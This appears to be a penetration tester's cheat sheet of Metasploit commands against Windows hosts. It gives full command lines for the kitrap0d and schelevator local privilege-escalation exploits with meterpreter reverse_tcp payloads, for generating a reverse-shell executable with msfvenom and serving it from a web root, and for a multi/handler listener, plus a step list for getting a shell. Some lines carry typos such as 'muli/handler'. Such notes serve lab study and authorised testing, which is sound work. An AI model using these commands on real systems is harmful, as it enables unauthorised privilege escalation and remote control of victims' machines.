msfconsole commands we used include:
search for module that affect the windows platform and has a type of post.
search type:post platform:windows
search for module that affect the windows platform and has a type of exploit and can be run via a local session.
search type:exploit platform:windows path:local
list out all the background sessions
restore background session by id.
sessions -i #
Use this module to enumerate possible vulnerabilities on the target host. This module needs an established session to run against and can be seen when run ‘show options’. SESSION is the id of the established session.
use post/windows/gather/enum_patches set SESSION 1 run
Use the ‘kitrap0d’ exploit to get SYSTEM level privileges on the windows box.
info exploit/windows/local/ms10_015_kitrap0d use exploit/windows/local/ms10_015_kitrap0d set SESSION 1 use payload windows/meterpreter/reverse_tcp set rhost 192.168.160.110 set rport 7479 exploit
Use the ‘schelevator’ exploit to run a scheduled task as a SYSTEM user and start a reverse tcp shell using those privileges.
info exploit/windows/local/ms10_092_schelevator use exploit/windows/local/ms10_092_schelevator set SESSION 1 use payload windows/meterpreter/reverse_tcp set RHOST 192.168.160.110 set RPORT 7478 exploit
Generate a reverse meterpreter payload msfvenom (Kali 2). This payload can be executed from a target host and will start a reverse tcp session.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.168.110 lport=7477 -f exe -o /var/www/html/payload.exe
To allow the above session to connect you will need to start a listener from your kali instance.
use exploit/muli/handler show options set LHOST 192.168.168.110 set LPORT 7477 set payload windows/meterpreter/reverse_tcp exploit
Steps to get a meterpreter shell
- deliver a payload
- use an exploit to have msfconsole drop and execute the payload.
- manually create the payload then find a way to get it on to the target and executed.
- listen for a the reverse tcp shell connection.
- if you can use an exploit then this will be taken care of for you.
- if you manually drop the payload then you can use the exploit/multi/handler module to listen for incoming connections.
Exploit vs Payload?